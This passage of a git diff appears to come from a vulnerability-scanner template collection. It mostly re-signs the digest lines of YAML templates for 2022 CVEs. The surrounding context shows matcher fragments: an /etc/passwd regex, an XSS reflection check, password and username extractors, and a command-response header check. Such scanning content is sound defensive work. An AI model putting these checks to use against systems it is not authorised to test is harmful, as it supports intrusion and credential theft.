@@ http: - 'contains(content_type, "text/html")' - 'contains(body, "searchwp-live-search-result")' condition: and -# digest: 4a0a00473045022100ce99a810f18c3580dc53dec26f654ec5a94675757e364472d20001b98ca728c4022075bf8b9ccb4a047229ba32d4ca1f30080beffcb0977cae4ffd8d4fda0f321d55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200d99c81977798e9261aae80ce5f4079d512acc44db3165387e35075333e4f87402201a07e4c723fbeea5fb70fa31b6bed33f8ca1d0ee4dbebb75dcb447fd779039c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25356.yaml b/http/cves/2022/CVE-2022-25356.yaml index 92deabe1a8..9018e85856 100644 --- a/http/cves/2022/CVE-2022-25356.yaml +++ b/http/cves/2022/CVE-2022-25356.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fcd9816f08457977ac3b55c1a3cf825033d2ed8d1c332c96ff28705868e4f650022100dbe371c9acb648faacc3c92bd31b064f53fdbe17b3e46eb0e9595c4deb0bcfd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c03117b06972653a7b22cba6c3068b568a29363df73557a8034cb9f0e5609c8f02202045d5d9b7857b6fe05c3329d99c72df86b78c51ef7abc1acef7eab11478c549:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25481.yaml b/http/cves/2022/CVE-2022-25481.yaml index 0c7108892f..19fef61e65 100644 --- a/http/cves/2022/CVE-2022-25481.yaml +++ b/http/cves/2022/CVE-2022-25481.yaml @@ -60,4 +60,4 @@ http: - 500 - 404 condition: or -# digest: 4b0a00483046022100b496345378ef7c5282eccf0ef4750c6c8be7b5d9ead61c0d0e8699049a7a1f6402210099374a6431005d5758183a4b42b31f0edbd2a5764afc3ca59af2ef7e03953fcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d1c235f1ca5801d3b9ffe3eb43ba0b79b746356a0fc112738d5ed3882489350802200af2dd9bc42f4297d28fd09fd942069f6e72126b3d7b3dad665235cf0f94cb9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25486.yaml b/http/cves/2022/CVE-2022-25486.yaml index 0769494883..a53cbb4242 100644 --- a/http/cves/2022/CVE-2022-25486.yaml +++ b/http/cves/2022/CVE-2022-25486.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d9af1a8a2a7a6a3c65fffdd36d187033e9d8f9359c5ba7fbdf1c7e7522ab3a7c02200b66649c50c196fe79d3fd5010175cc3440562f4bb473c24296993c71c05f7d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202f1740073b822d3173dca404379a8be3ea219605153d606b6cb8854a7f26838c02207a187fc2566ef3b2a72d9d786462cb900abf131d4a4b36d2c997db4d85d4d772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2551.yaml b/http/cves/2022/CVE-2022-2551.yaml index bfcae28bb8..fcf463ac1b 100644 --- a/http/cves/2022/CVE-2022-2551.yaml +++ b/http/cves/2022/CVE-2022-2551.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206b88fc37bec53086c40a2dab39585c96a5b146c52946e88686cea2be9f6ddf6002206caa29030300ee31f345d6a9a8dff7b389b4fec4576d174a277b621633d1839b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bcea4e5831adc1e51e0fa302d4ca1cc7e411e57ac74e64cfb714efb6c67a19c102201a030d6b966593b3c95b414db9a89cdf3fdf2be1094d0fa8cbcaa52b1623f7fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25568.yaml b/http/cves/2022/CVE-2022-25568.yaml index e29a698c40..c1ceb878a4 100644 --- a/http/cves/2022/CVE-2022-25568.yaml +++ b/http/cves/2022/CVE-2022-25568.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022046f3415c25e4170d3a1e7eafedf7b6545c403151d253702b842924c160136f30022100efa20445934086bb0d0bec0aa8e0d036327507e7b5f662c630e6648262e40f2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200cb966e799aa6b403708300915ce27d6169f114e4f30a6c02f39223539c03a4802201e5a78c7f8cb76d6b71843af7a1637b192ca9646689c926ae101fc490f535516:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2599.yaml b/http/cves/2022/CVE-2022-2599.yaml index 3330f4a699..a0caf0543d 100644 --- a/http/cves/2022/CVE-2022-2599.yaml +++ b/http/cves/2022/CVE-2022-2599.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202fbbbb976d8ec173fa0b4b3fc0690cb96e8129fa7ad1ea9dd2f5ab4b958b3ef20220034df02d68653a3be20b73be3ee6bed59e6e53d12887f4a26b9590ce712eaba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e258b9f11dbd18f7073278294b5e95f93cb1632ab09f0e8466385b501d27b928022060ccc0afb4dfe875564ae7d09563579f83b81e9f8397dfd44b16bbe0b03b439b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26134.yaml b/http/cves/2022/CVE-2022-26134.yaml index a3695fe80c..d914322764 100644 --- a/http/cves/2022/CVE-2022-26134.yaml +++ b/http/cves/2022/CVE-2022-26134.yaml @@ -60,4 +60,4 @@ http: kval: - "x_cmd_response" part: header -# digest: 4b0a004830460221009c4c2bddd8a5eb51b19b59ae34437762eff3249e20f46ff34be84566f6b41ec2022100ec4f8677c9bf0dd38acbd6da055006ca71ba1b7434da22e5cdb9c4fc2c54f15b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ac37e2568eb7812db5756fd1f4b5f9ac62fdf6d6e8e5140d654e18c86252c05d0220348834aff851416b8d7ef0aeb24cba256e3146035b6a4e7aa17c0c0d3fe8ec84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26138.yaml b/http/cves/2022/CVE-2022-26138.yaml index 1ad8ae0754..d0aa9ad81f 100644 --- a/http/cves/2022/CVE-2022-26138.yaml +++ b/http/cves/2022/CVE-2022-26138.yaml @@ -52,4 +52,4 @@ http: - type: dsl dsl: - 'location == "/httpvoid.action"' -# digest: 4a0a00473045022100863824d1fc782c5fabc3dea7419d4b3c5b4bcaf83ab4b9fe66594b79ea2209a802204a42e7087082e472a4cc05bab3a0a30dbf881746e790b03855537d4c264dc1aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f9629379858e489e0373dd6298a9843439d7811d68e96c22f0ba48704d144b6f022100ed1da678861b0744d53e8b2f56e1527a4e464ca576ab2b2fb154cda4f1902a3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26148.yaml b/http/cves/2022/CVE-2022-26148.yaml index 2fcf144a9b..1ecb533a1c 100644 --- a/http/cves/2022/CVE-2022-26148.yaml +++ b/http/cves/2022/CVE-2022-26148.yaml @@ -72,4 +72,4 @@ http: - '"password":"(.*?)"' - '"username":"(.*?)"' - '"url":"([a-z:/0-9.]+)\/api_jsonrpc\.php' -# digest: 4b0a00483046022100a139554a17ea123a9c2e59ac77e260256394de84e1c3b6d88004efe8dd0340da022100f744af2af84e2ab78fc970895b8702d5bc14aa4035a42ef57fbf3094b3c5a6cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022022a52624da08779828e7200d0c3a10d677bf198187c32c7f24b088d1b9768bbb0221009f7480d597c7c14cdfa40ae885682d1f0a77e45afb8da10d23799f068c703ddf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26159.yaml b/http/cves/2022/CVE-2022-26159.yaml index 6463c6cf7b..10c501b04b 100644 --- a/http/cves/2022/CVE-2022-26159.yaml +++ b/http/cves/2022/CVE-2022-26159.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d8276e7109d2bd69d3ea42af14353f15d96864cf72e8e0effcef94a02a2a499b022032467aecf3198c0b7e34fa5664b2c75d91a03e94423d9d3168960d7a55e2bfa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210083dc0ecd9851313a1db6452ab44bf40b17047458eadfe88b70661ce550237121022100e3eb066d716f039b9781bb6c11dbd04a598b39e12c8b89e76455b7f35f37122a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26263.yaml b/http/cves/2022/CVE-2022-26263.yaml index 058a23b40d..4803b3f293 100644 --- a/http/cves/2022/CVE-2022-26263.yaml +++ b/http/cves/2022/CVE-2022-26263.yaml @@ -45,4 +45,4 @@ headless: - '")' condition: and -# digest: 490a004630440220729431423049e0675d567b6cbd1d77e01b4e70f542ae8a569d9765cf8dcd344b02205d87faab9dfcd79998b0d0e68c7e91eb95180dd93bf447409ae8c7579e50761b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022069a028adbc425d6ae05098c13bf8ffd40f8f4fd169b249d5301e9b272fd5cd0d0221009f105bffb4a92989616147b45ee69ae3889319bd42699e23e1a0dcfc3dcf74c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38553.yaml b/http/cves/2022/CVE-2022-38553.yaml index f49c0a2055..b0b3a93e6f 100644 --- a/http/cves/2022/CVE-2022-38553.yaml +++ b/http/cves/2022/CVE-2022-38553.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fbccb7770e584f307e973153aef2413de086a622bfdc9f2d7d75ffcdcc560f04022100c2426ac89b16016df32ade6f0ece4162582fb001bc8204b7d5e59d8a9a9b83f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100efaea75dc2c45f07f191d73d55919854d51b645312c86c5ce2e869134c63613b022028c4ff5c898944d48e583ab33a5fcda59f13cbb59bf67725c0045cf3ab857f4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38637.yaml b/http/cves/2022/CVE-2022-38637.yaml index 325eb6ea97..435ad8eed0 100644 --- a/http/cves/2022/CVE-2022-38637.yaml +++ b/http/cves/2022/CVE-2022-38637.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220218bdc2e0fa378e5ffcd162a69c37028a479680c6861d157c617c6d36fbfd5c4022100b7706b7c27cb0c75ea4ba4d4ecd5c5e5ee3e3d2712bad1e76dd7985fa47ca574:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fa41e2a4a1333eaad813d24ed3d0c9b4dd5ac54f3bfd8c4430ddaaea36a3726f02200fbfe631992975c91ca53b131bf4af8723b5ef4e373400ab0d54243b6a4205cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38817.yaml b/http/cves/2022/CVE-2022-38817.yaml index 7537ee8854..1871bb27c3 100644 --- a/http/cves/2022/CVE-2022-38817.yaml +++ b/http/cves/2022/CVE-2022-38817.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009fcc61d97e45a24d1ba74a9e55262ae16608c317bd73c0a8af941946c2dedde202207a94d89889634d23f327197f984ab320b5b0fbaa5548393e88d780983082c9e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205ea9f50dc71fc8b5f4d75dd29b1081cded28ba8d5cf5feffdcb3c6c08d82dd12022004ebd2036c0cd6f38f7f234b4d8393eae2efb944eaefb368f24c0c4340564986:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-38870.yaml b/http/cves/2022/CVE-2022-38870.yaml index c33866d0b0..ad16755362 100644 --- a/http/cves/2022/CVE-2022-38870.yaml +++ b/http/cves/2022/CVE-2022-38870.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200caed94f4b8e27ec84172f90ed66d6e4f8f48d0ef7a5a0a357277508b5a72bc90220296289a75e6d6fb85d9dc169017500c3b5068b79554b112583909bab61961620:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220530de25fd2aa5188ccc446773bf2beaa97de3e6ab7d44bdda6c2d355e157c3a902204a6dc27b1cf836e8fc177889d1be5f4d8badadae80c48b38011f9ac73e36f27d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-39048.yaml b/http/cves/2022/CVE-2022-39048.yaml index 81824e1f91..7e04ab1a14 100644 --- a/http/cves/2022/CVE-2022-39048.yaml +++ b/http/cves/2022/CVE-2022-39048.yaml @@ -76,4 +76,4 @@ http: regex: - 'name="sysparm_ck" id="sysparm_ck" type="hidden" value="(.*?)"' internal: true -# digest: 4b0a00483046022100c5fa11e07228baa851dfaa62aa39232ffa643fb0afb07d45b9896a821d672e9b02210089f9b35148f6eca98dfcb05a554b8116051cb414fd910f34a5e97dfef3c06658:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100da524e0203d5d024163d328c7b563819656a367d0256cc2a9871741c055e343002210085ff4cbd8c79a9b4db77f6b95e28051921569875f7cb8e5f1b7b6db55a26dc34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-39195.yaml b/http/cves/2022/CVE-2022-39195.yaml index 4367d97008..6518d97a10 100644 --- a/http/cves/2022/CVE-2022-39195.yaml +++ b/http/cves/2022/CVE-2022-39195.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200f76032d2bd41c6495a1860289244da3d82b38e08f0a848eb2518c5cd1da7700022100a1576d48ab95c0498cb797b6a0b47ba69036a19a7f60a940ef5af91db82e3648:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204cd9a877de69668bc2a7891aa654a7d70d30004120c13e29a87790f6a26b1636022100b2752777060d9297dc81a092d31abda719a0b244d1b6639dc032c75d6f58dc1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3980.yaml b/http/cves/2022/CVE-2022-3980.yaml index 6059daa30a..be50185362 100644 --- a/http/cves/2022/CVE-2022-3980.yaml +++ b/http/cves/2022/CVE-2022-3980.yaml @@ -58,4 +58,4 @@ http: - "status_code == 400" - "len(body) == 0" condition: and -# digest: 4a0a00473045022008e6fc96139321b63c219be01deaba3cdcb5162125388950a7f6deb6ea2a880c022100e7f5d8a99f9197d292b76c18f45930d939eb1b884a19e6e1c1830d3773d84081:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e2c1e122f1c0b31a4d9b7a1d627c23c6927ab04afc2c22896f566b22099045d20220723074a6d2578d3242ff20877ef7d2c6c783861ba9027f0fe538fa47f15a41d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-39952.yaml b/http/cves/2022/CVE-2022-39952.yaml index ff8097dac3..78bbaee4df 100644 --- a/http/cves/2022/CVE-2022-39952.yaml +++ b/http/cves/2022/CVE-2022-39952.yaml @@ -69,4 +69,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204c791685793b8fb80abb043da7ae5f3710b1d65a1b3d9faa3ccf50495fe31d8c0220231ab3489ab8f6663a3af33c508d38391bbcdd97105dbe2e568b4f354d138d49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022003035f8cc502ab55a0f9556bca3493ee3a7a220a55bd9d48ff0960e351249c9a022100d929f8578d6b592f54fac3cb3c5a4466c2be8f794e9d11a9172c50150b9426d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-39960.yaml b/http/cves/2022/CVE-2022-39960.yaml index 3b67b7be9e..103f124a33 100644 --- a/http/cves/2022/CVE-2022-39960.yaml +++ b/http/cves/2022/CVE-2022-39960.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ecf4d28cfa4d8e9acc7e30ed93c9a855b4ac47d0b0677e40a403af6b77ccbbaa02201c2965ab840d94e84d219352549c7bee2fa56db29dd22b4969220785e523a706:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206e65f8aba6fb09f74cf660348b79280bc133deeb3d7b98d7a3df6abed9b2dba702210082a92e1594f43ea24fa82827b3ffc2f7f75f95ae6477bcd5bc8c3369585cfa68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40047.yaml b/http/cves/2022/CVE-2022-40047.yaml index bcc7adcddc..45f4d0b853 100644 --- a/http/cves/2022/CVE-2022-40047.yaml +++ b/http/cves/2022/CVE-2022-40047.yaml @@ -65,4 +65,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "onfocus=\"alert(document.domain)")' condition: and -# digest: 4a0a0047304502202f417f9c6a9bc8988c5824b6075056008b654161a9396aff002ffca2e4bcce43022100a52a836cdaa54785747fbf37a4038560dc03ed7658de60a2e3b3df96f364c0b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207bcc353db4d058630542b58e5333c80f5af22d37aeb46339f2537a7d232c946202200a722ceed090a64fe807e887df73a34042f4a50a5f76d6d4446bc587d56432a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40127.yaml b/http/cves/2022/CVE-2022-40127.yaml index 9314a2628e..ca2a85b9ea 100644 --- a/http/cves/2022/CVE-2022-40127.yaml +++ b/http/cves/2022/CVE-2022-40127.yaml @@ -92,4 +92,4 @@ http: regex: - 'type="hidden" value="(.*?)">' internal: true -# digest: 4a0a00473045022100ebe83b1242fcb8fe11714df6a287cde525554d92a497b22f7ede7908f4fb5cfb02205a1ddf89bd0b1863b1447050811ac7aef2af7efbc667369f3aa7964e666ebbbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b18e32bd4c38ce4d2980f47f36b330213223427e1a817ba0576176dfb730319102201a31201b20cf5f32090e8f1f571bfa9f13d735f23ec67381eed738e665a80e07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4049.yaml b/http/cves/2022/CVE-2022-4049.yaml index 39a6c084e7..cc8f933197 100644 --- a/http/cves/2022/CVE-2022-4049.yaml +++ b/http/cves/2022/CVE-2022-4049.yaml @@ -67,4 +67,4 @@ http: regex: - '"wpuser_update_setting":"([0-9a-zA-Z]+)"' internal: true -# digest: 4a0a0047304502205d7851e48c4e4378d873ca3cb418e5f219d743c9e435e418b019e2ad5406d8ac022100a67ef8c0944a86563491b84687b0802d41eaf9aa23d6983ba84adcd92001651d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009f2cbc14364ac05c5c2dff254226127506c3190a3ba76512afa101ec3d1ae79202207ff986195db0fe3402ab65772f29a6041fce7ff6bdc78a81bee06024b9aa4fee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4057.yaml b/http/cves/2022/CVE-2022-4057.yaml index 6d66b86386..626a1c5bdd 100644 --- a/http/cves/2022/CVE-2022-4057.yaml +++ b/http/cves/2022/CVE-2022-4057.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dbc7a4be2db79fa23a7322882eaee4e6265c68ed63a1f362330c9cdfc9cc6e080221008b8fe074d0e0ed77669e14a6d9485d5308a3f1daadeb7f96c155aab4c2dc56d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205fec4c58b267b8105cb2a3409a6690b17ea32caef1278c19456a16fbe975222c022100a505b11aa75ef278330e087760b9a806b221d7f3a1cc9d7c6b8aafaa42e136e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4059.yaml b/http/cves/2022/CVE-2022-4059.yaml index bac75cfd07..146a1d075b 100644 --- a/http/cves/2022/CVE-2022-4059.yaml +++ b/http/cves/2022/CVE-2022-4059.yaml @@ -48,4 +48,4 @@ http: - 'status_code_1 == 302' - 'contains(body_2, "Cryptocurrency Widgets Pack")' condition: and -# digest: 4a0a00473045022100aa848372256d7eabf159884aa037d2138e09d0c0e9364174fb773e7750150b5b02205114c8a8a2cefe0b44d0a1bf4545e9497db91863201b990cb9b3d8ab8e430547:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204a68c3a5cbb5de1fbdb1e520c2b1cbbbc7069afe1638289d5c09440a45fcdce3022100a6a65a2506ec6dcf265e4264783cec5d3a1cfdaa0560b0b9444d2d8174f2066d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40734.yaml b/http/cves/2022/CVE-2022-40734.yaml index 75ac502f3e..de1325843c 100644 --- a/http/cves/2022/CVE-2022-40734.yaml +++ b/http/cves/2022/CVE-2022-40734.yaml @@ -46,4 +46,4 @@ http: - type: regex regex: - "root:[x*]:0:0" -# digest: 4b0a00483046022100e14c07ad587a3f6127ab6597730c3e3f61032076278d8cb85f9716bc1772e248022100824d3485478fe6a408364349dce3a19485ba0d97cc0000fed941aefb72e9bef5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d204c770b198c4635b4fbc52cf8a047c87b2cfbc536ce46b75e6d1af120ac599022100c25485435188c000143e079c811d4e3daa086c5508e24077e055c1a887e65050:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40879.yaml b/http/cves/2022/CVE-2022-40879.yaml index 89c55b804d..a35063b3c3 100644 --- a/http/cves/2022/CVE-2022-40879.yaml +++ b/http/cves/2022/CVE-2022-40879.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220486e0cb03c2e34247dedc7a42f63cb1ed28d217628d3928db994c42f82eb87fc02203f6caf27418908145e8df9ef5e14d21bcec4f05d876ffaeb892707180ae6ad09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205ff051a290a7b4323e101e8ecd1c1f705567e277eb9273290025454f35dda57e0220568ee1117cb034a32c1a75b9aec933f935242a50a6d4e86a0722bcbea68af77e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-40881.yaml b/http/cves/2022/CVE-2022-40881.yaml index 73ee07473c..478fe1178e 100644 --- a/http/cves/2022/CVE-2022-40881.yaml +++ b/http/cves/2022/CVE-2022-40881.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220364ed7094ab718d0431d62a890a3195e8a44e770c3f86399f40e0ef3bf82e2e002210086e72e146fd8e3f380f84e27adf02191f4bd968348207d06486ee47d6f1e7f1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202676c7e62987d4879069afc20a7985de576ae70937053282e84ee6b3d12602680220469076fb4b5cbcdfd9832dbab7a42e2bf165a38d7243e5e16921ef1be94f2d4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-41412.yaml b/http/cves/2022/CVE-2022-41412.yaml index a218815aa2..dc460459bd 100644 --- a/http/cves/2022/CVE-2022-41412.yaml +++ b/http/cves/2022/CVE-2022-41412.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e289bfe0e9e294db8ec0302ed57729f551317c0e023ead21655a3094f8f53af7022100d799e09b724832d7efbc4cf2e89d16d68785ef1a9ee0af3b5fd3806d750bb936:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022006a47d11706105ec5ff8bb32f84f5cc23566591377947e1d8f90888a3b028bf702203843cbf5b2bc7b991f92043424c560f048dacc0128451c47d25c1b40528b5034:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-41441.yaml b/http/cves/2022/CVE-2022-41441.yaml index 06718fb276..5c6e58cab1 100644 --- a/http/cves/2022/CVE-2022-41441.yaml +++ b/http/cves/2022/CVE-2022-41441.yaml @@ -50,4 +50,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body_2, "") && contains(body_2, "POProcessTimeout")' condition: and -# digest: 490a0046304402201c7ef3b8c12ab51dc33ff38f8ed0b048b9ca192ded1f57a3c2c8b201196cc3e4022069beb886ff9cc76db0c72220d36592f48578c9909c820680621dcc6f556abb2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a173d3995f2152103e548a47c77d0cef7aacccaa3eb5449ff74d74f257519c8c022100c607b094a88a70882478992ab5bdef4034eb3eb55adc8c61189596a919342268:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-41473.yaml b/http/cves/2022/CVE-2022-41473.yaml index 0425c0cd93..ed4b2335e9 100644 --- a/http/cves/2022/CVE-2022-41473.yaml +++ b/http/cves/2022/CVE-2022-41473.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205dbe51398af59064054a0f4a137661c719a7bbdfb4fba9a4416a0c8e329177ae02203007e3f7e09d32b655a478a58c1034a26954e59325f5d4946da39ce865b77473:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200931be46cb86f8fd8f8330c488ce9bdeb7013d0e3f704cce5bc77432cf040928022100c7aa9184cf2433d6c9751e9d82b4c63a157845a6589d2c0e4a88b7d9e2fbe02b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42094.yaml b/http/cves/2022/CVE-2022-42094.yaml index 70d56a827f..8a6d5bf08d 100644 --- a/http/cves/2022/CVE-2022-42094.yaml +++ b/http/cves/2022/CVE-2022-42094.yaml @@ -170,4 +170,4 @@ http: regex: - name="form_token" value="(.*)" internal: true -# digest: 4a0a004730450221009254c581a66525d51374780544548b0fe6f6ae80401be65bd189894a7f566980022047ad24d5ffa12be36ccdc28b16554bebad6f96e3a4e0ef86623ac93beedba22e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b7dcccec0a5c34af4d9f3e1d71034d1f2cd8e20159ac2680b5c5e7ee07eca4d2022100d25e5b4830a7a27c5ac425cbafaa3977e30c8912e328b18bb24a6b708b0072f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42233.yaml b/http/cves/2022/CVE-2022-42233.yaml index 611aa9d9ae..0a89d89d6d 100644 --- a/http/cves/2022/CVE-2022-42233.yaml +++ b/http/cves/2022/CVE-2022-42233.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210097665e0767c934a666cf05e3627f2b6d8dd5884c8d1357133b6c1a3af43b2d7a022100cc472353a177d1e473f1016d6ec099a23dff7144e78b65aba6b2013f40bdc009:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202d181cac4183afeebf0d5c880ba8a9a5120c7d91e727ad9fdd33ef47f7c8f9d0022100d934dee1e53460d8122b76c112a49540aaec0cbbdbad3ce7ecbab2909f7583c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42746.yaml b/http/cves/2022/CVE-2022-42746.yaml index 371ac72b8c..05ed3c9590 100644 --- a/http/cves/2022/CVE-2022-42746.yaml +++ b/http/cves/2022/CVE-2022-42746.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 404 -# digest: 4a0a00473045022039fe11caf5250995e163d4a766f610d944380417a5b15906a9ef6a50792288bc02210093ff5a9b48efb195c8f6dfbc8f5cd26393edf6f89159808dce94156e8fe2c052:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b7bdee4535c47a7b7243bbbb2b8852ab12b71acaab2f4b7cbda5d694482dd45602200aa28f262d89a6b35f0763480930a60284d0b2050d0e84373305628fd5cbace6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42747.yaml b/http/cves/2022/CVE-2022-42747.yaml index 989c9c9c6e..b7fcea0510 100644 --- a/http/cves/2022/CVE-2022-42747.yaml +++ b/http/cves/2022/CVE-2022-42747.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 404 -# digest: 4b0a00483046022100d31eac3d15d81134911f90f3c97df9b33a3f368a6e719f11104eb87b6b014a64022100b087422d6f0c4d4b4ac90c6da503f8cde1a878308d465636399a9a8770b32912:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022043c9d60d53341e836f31ef8101cb06cb8afe80d1a0e49a73f24ccce4af5c320202210090570a97187769d3ae895ea93ae2688f0c0398df176fa3bc963e90a158a6151b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-42748.yaml b/http/cves/2022/CVE-2022-42748.yaml index 837b641fbe..c391c015c4 100644 --- a/http/cves/2022/CVE-2022-42748.yaml +++ b/http/cves/2022/CVE-2022-42748.yaml @@ -57,4 +57,4 